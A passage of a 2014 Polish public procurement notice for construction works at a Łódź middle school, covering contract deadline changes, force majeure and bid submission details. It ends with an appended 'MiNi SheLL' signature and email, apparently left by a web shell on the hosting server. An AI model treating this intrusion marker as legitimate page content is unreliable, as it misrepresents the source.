          wykonanie przedmiotu umowy w ustalonym terminie lub negatywnie wpływających 
          na jakość wykonania lub trwałość przedmiotu umowy.  W takim przypadku termin 
          zakończenia robót zostanie przesunięty o czas, w którym roboty nie mogły być 
          prowadzone,
     b/ z innych przyczyn np. wstrzymania robót lub przerw w pracach zależnych 
          od Zamawiającego,
      c/  przedłużającego się oczekiwania na uzgodnienia, decyzje administracyjne, itp., które 
          nie jest zawinione przez Wykonawcę, 
      d/  wystąpienia konieczności ograniczenia zakresu rzeczowego przedmiotu zamówienia, 
           wówczas termin wykonania zamówienia ulegnie skróceniu,
      e/ działania siły wyższej, 
      f/  zmiany uwarunkowań prawnych i formalnych realizacji umowy, spowodowanych 
           działaniem osób trzecich,
      g/ wprowadzenia rozwiązań zamiennych, które nie wykraczają znacząco poza 
            zdefiniowany przedmiot zamówienia i nie są traktowane jako zamówienie dodatkowe 
            lub uzupełniające, a są korzystne dla zamawiającego (np. podniosą funkcjonalność
           pomieszczeń), o ile nie spowodują wzrostu wynagrodzenia.
      h/  konieczności wykonania robót dodatkowych, wykonania których nie można było
          w żaden sposób  przewidzieć w chwili zawarcia umowy
2. Zmiana zakresu przedmiotu umowy jest dopuszczalna, jeśli zostanie stwierdzona 
     konieczność zaniechania wykonania części robót budowlanych. Ta sytuacja będzie 
     skutkować zmniejszeniem należnego wykonawcy wynagrodzenia o kwotę stanowiącą
     równoważność zaniechanych robót. 
3. Za okoliczności siły wyższej uznaje się między innymi: pożar, powódź, huragan, 
    eksplozję, awarie energetyczne, wojnę, operacje wojskowe, rozruchy, niepokoje 
     społeczne, ograniczenia i zakazy wydane przez organy administracji publicznej, a także 
     inne nadzwyczajne zjawiska losowe i przyrodnicze, wszystkie z nich powstające poza
     kontrolą Stron, których nie można było przewidzieć w chwili zawarcia umowy, a jeżeli
     możliwe były do przewidzenia nie można było im zapobiec. Zaistnienie siły wyższej 
     powinno być udokumentowane przez Stronę powołującą się na nią. 
4. Zmiana terminu wykonania roboty budowlanej będzie możliwa w skutek okoliczności 
     opisanych powyżej i w formie aneksu. Warunkiem zmiany zawartej umowy jest:
1)  uzasadniony wniosek wykonawcy o przedłużenie terminu wykonania robót, złożony 
      nie później niż w ciągu 7 dni od zaistnienia okoliczności uzasadniającej zmiany, pod
      rygorem utraty prawa do zmiany umowy,
 2) protokół konieczności określający przyczyny zmiany i potwierdzający wystąpienie  
      okoliczności, o których mowa powyżej, sporządzony i podpisany przez strony umowy.    
      Protokół konieczności stanowić będzie załącznik do aneksu, zmieniającego niniejszą
      umowę w zakresie przedłużenia terminu wykonania robót.
 3)  posiadanie aktualnego ubezpieczenia odpowiedzialności kontraktowej i deliktowej oraz 
      zabezpieczenia należytego wykonania umowy. 
 Nowy terminu zakończenia roboty budowlanej, uwzględni okres niezbędny do prawidłowego 
 wykonania umowy, nie krótszy niż okres stanowiący przerwę w wykonaniu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gim41.szkoly.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczne Gimnazjum nr 41 im. St. Żeromskiego w Łodzi 
ul. Bohdanowicza 11, 93-552 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2014 godzina 11:30, miejsce: Publiczne Gimnazjum nr 41 
     im. St. Żeromskiego w Łodzi, adres: ul. Bohdanowicza 11: 93-552 Łódź - sekretariat 
     (parter)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com